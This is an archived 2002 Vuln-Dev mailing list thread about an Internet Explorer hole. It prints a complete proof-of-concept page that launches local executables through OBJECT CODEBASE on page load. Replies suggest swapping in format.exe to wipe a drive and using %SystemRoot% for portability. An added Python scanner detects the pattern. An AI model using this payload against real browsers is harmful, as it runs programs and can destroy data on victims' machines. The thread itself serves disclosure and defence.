Vulnerability Development mailing list archives
RE: Rather large MSIE-hole
From: "Jim Harrison (SPG)" <jmharr () microsoft com>
Date: Wed, 13 Mar 2002 11:58:30 -0800
While it's certainly true that you can hard-code any path you want to any normally-benign executable on the system, any hacker worth their salt would know how to get and use Windows system variables to make the system cooperate in its own self-destruction. For instance, "%SystemRoot%" would eliminate the need for "C:\windows"

*
Jim Harrison
MCP(NT4, 2K), A+, Network+

-----Original Message-----
From: NyQuist [mailto:nyquist () ntlworld com]
Sent: Wednesday, March 13, 2002 12:46 AM
To: Magnus Bodin
Cc: Vuln-Dev
Subject: Re: Rather large MSIE-hole

If this is confirmed, could this array be changed to equal, erm...let's say format.exe (with a couple of parameters to silently format C:/)?

var programName=new Array(
'c:/windows/system32/logoff.exe',
'c:/winxp/system32/logoff.exe',
'c:/winnt/system32/logoff.exe'

On Wed, 2002-03-13 at 06:06, Magnus Bodin wrote:
On Tue, Mar 12, 2002 at 11:32:20AM +0100, Magnus Bodin wrote:
> The latest MSIE-hole is now spreading.

Sorry. Something broke there with the inclusion of the code. I've not done any large scale testing of this apart from getting reports from a lot of friends and colleagues that they are vulnerable still after running Windows Update. Here it is, complete with all the pop-up code:

--%< cut here-----
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<META http-equiv=Content-Type content="text/html; charset=windows-1252">
<SCRIPT language=JScript>
// Local paths tried in turn; whichever exists on the victim's install is launched.
var programName=new Array(
  'c:/windows/system32/logoff.exe',
  'c:/winxp/system32/logoff.exe',
  'c:/winnt/system32/logoff.exe'
);
function Init(){
  // createPopup() gives a window whose OBJECT tags IE resolves with a local CODEBASE
  var oPopup=window.createPopup();
  var oPopBody=oPopup.document.body;
  var n,html='';
  for(n=0;n<programName.length;n++)
    html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
  oPopBody.innerHTML=html;
  oPopup.show(290, 390, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
You should feel lucky if you dont have XP right now.
</BODY>
</HTML>
--%< cut here-----

--
magnus
MICROS~1 BOB was written in Lisp.
http://x42.com/
--
NyQuist | Matthew Hall
-- NyQuist at ntlworld dot com
-- http://NyQuist.port5.com
Sig: #define QUESTION ((bb) || !(bb))
ubKey : 649779B0 (certserver.pgp.com)
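Added here as an illustration, not code from anyone in this thread: a small Python content scanner for the pattern under discussion. It flags OBJECT tags whose CODEBASE is a local path (drive letter, UNC, file: scheme, or a %VAR% expansion such as the %SystemRoot% form mentioned above) and, because the PoC builds its tags in script, also string literals naming local executables. The sample HTML is constructed for the example.

```python
import re

# Constructed sample (not the thread's PoC verbatim): one OBJECT with a drive-letter
# CODEBASE, one using %SystemRoot%, one legitimate remote CODEBASE, and a script
# array of local paths like the one the PoC concatenates into its tags.
SAMPLE_HTML = """<html><body>
<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111'
        CODEBASE='c:/winnt/system32/logoff.exe'></OBJECT>
<OBJECT CLASSID="CLSID:22222222-2222-2222-2222-222222222222"
        CODEBASE="%SystemRoot%\\system32\\logoff.exe"></OBJECT>
<OBJECT CODEBASE="http://example.invalid/control.cab"></OBJECT>
<script>var programName=new Array('c:/windows/system32/logoff.exe',
 'c:/winxp/system32/logoff.exe');</script>
</body></html>"""

OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.IGNORECASE)
# name=value pairs with double quotes, single quotes or no quotes
ATTR = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
# drive letter, UNC prefix, optional file: scheme, or an environment-variable expansion
LOCAL_PATH = re.compile(r"^(?:file:/*)?(?:[a-z]:[\\/]|\\\\|%[a-z_]+%)", re.IGNORECASE)
EXEC_EXT = (".exe", ".com", ".bat", ".cmd", ".pif", ".scr")
# quoted string literals (script or markup) long enough to hold a path
QUOTED = re.compile(r"""["']([^"'<>\n]{4,})["']""")


def attrs_of(tag):
    """Parse one OBJECT tag's attributes into a dict keyed by lowercase name."""
    return {k.lower(): a or b or c for k, a, b, c in ATTR.findall(tag)}


def is_local_executable(value):
    """True when a value is a local path ending in a program extension."""
    v = value.strip()
    return bool(LOCAL_PATH.match(v)) and v.lower().endswith(EXEC_EXT)


def find_local_codebase_objects(html):
    """Return (classid, codebase) for OBJECT tags whose CODEBASE is a local path."""
    hits = []
    for m in OBJECT_TAG.finditer(html):
        a = attrs_of(m.group(0))
        if LOCAL_PATH.match(a.get("codebase", "").strip()):
            hits.append((a.get("classid", ""), a["codebase"]))
    return hits


def find_local_exe_literals(html):
    """Local executable paths in string literals, catching tags assembled in script."""
    return sorted({s for s in QUOTED.findall(html) if is_local_executable(s)})
```

A non-empty result from either function is a strong signal for this class of page and is cheap to run at a proxy or mail gateway.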